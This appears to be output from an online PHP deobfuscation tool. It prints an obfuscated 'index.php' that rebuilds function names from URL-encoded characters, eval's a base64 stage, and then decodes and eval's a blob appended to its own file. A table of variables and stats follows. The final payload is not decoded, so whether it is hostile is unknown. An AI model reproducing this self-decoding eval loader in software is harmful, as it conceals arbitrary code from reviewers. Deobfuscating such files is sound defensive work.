Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$G..

Decoded Output download

$O000O0O00=$GLOBALS['OOO000O00']($OOO0O0O00,'rb');$GLOBALS['O0O00OO00']($O000O0O00,0x50c);$OO00O00O0=$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,0x1a8),'hlYLUBTsHyq1C4WuNpFKi5kMwR0em/zQJ8bDrcZOSXaGjPd6fn7+voI3g92AxVtE=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);

Did this file decode correctly?

Original Code

<?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xad0;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUwYyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnaGxZTFVCVHNIeXExQzRXdU5wRktpNWtNd1IwZW0velFKOGJEcmNaT1NYYUdqUGQ2Zm43K3ZvSTNnOTJBeFZ0RT0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>ZCMOWGPY}\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h]I_yIt

Function Calls

urldecode 1
base64_decode 1

Variables

$O0O000O00 fgets
$O0O00OO00 fread
$OO00O0000 2768
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 b9e167a39832f133fb9a5cc64a6aabdf
Eval Count 1
Decode Time 153 ms